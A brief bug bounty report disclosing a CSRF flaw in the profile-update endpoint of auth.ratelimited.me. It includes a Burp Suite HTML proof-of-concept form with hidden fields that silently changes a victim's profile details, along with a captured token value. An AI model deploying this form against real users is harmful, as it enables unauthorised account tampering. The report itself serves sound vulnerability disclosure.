Cross Site Request Forgery in auth in https://auth.ratelimited.me/

Hi there i found a vulnerable post that an attacker can execute csrf into the victim. Steps to reproduce: 1º login into your account and with burp on intercept the request off update profile. csrf1.jpg 2º Send the post request to the generator csrf poc and alter the details. <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://auth.ratelimited.me/profile/details/update" method="POST"> <input type="hidden" name="&#95;method" value="PUT" /> <input type="hidden" name="&#95;token" value="gTAHVqBk8TI4QlPBHku3gec3Aly0oD2vITwuEvot" /> <input type="hidden" name="first&#95;name" value="teste csrf" /> <input type="hidden" name="last&#95;name" value="teste csrf" /> <input type="hidden" name="birthday" value="2008&#45;12&#45;28" /> <input type="hidden" name="phone" value="" /> <input type="hidden" name="address" value="teste csrf" /> <input type="hidden" name="country&#95;id" value="0" /> <input type="submit" value="Submit request" /> </form> </body> </html> 3º save the html and execute into the browser the html and you will see the details off the victim changing. teste.html ## Impact attacker can manipulate victim information. CSRF token should be implemented and in case off implementation it should be random